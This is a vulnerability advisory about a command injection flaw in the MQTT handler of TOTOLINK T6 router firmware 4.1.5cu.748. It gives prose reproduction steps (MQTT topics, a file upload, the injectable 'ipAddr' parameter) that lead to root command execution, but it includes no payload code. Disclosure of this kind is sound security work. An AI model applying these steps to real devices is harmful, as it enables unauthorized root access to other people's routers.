TOTOLINK T6 Command Injection Vulnerability in MQTT Packet Handler

A critical command injection vulnerability has been identified in the TOTOLINK T6 router, specifically in the firmware version 4.1.5cu.748. The issue arises in the MQTT packet handler function 'ckeckKeepAlive', located within the 'wireless.so' file. This vulnerability allows remote attackers to inject commands by sending malicious MQTT packets, potentially leading to unauthorized command execution on the device.

Impact

Exploitation of this vulnerability allows for command injection, with the possibility of executing arbitrary commands on the affected device. In the context of the published proof-of-concept, this exploitation leads to unauthorized access via the Telnet service, with the injected commands executed as the root user.

Reproduction

To reproduce this vulnerability, first ensure that the device is running the affected firmware version. The exploitation process involves several steps: 1. Connect to the MQTT broker on the router. 2. Publish a message to the 'totolink/router/setWiFiMeshConfig' topic to set a specific value that enables the command injection. 3. After confirming the configuration change, upload a file named 'meshInfo.ini' to the device by publishing to the 'totolink/router/updateWifiInfo' topic. 4. Finally, send a command injection payload through the 'totolink/router/ckeckKeepAlive' topic, using the 'ipAddr' parameter to inject the command. The injected command will be executed on the router, and in the case of the proof-of-concept, it writes a file to the '/tmp' directory that can be accessed via Telnet.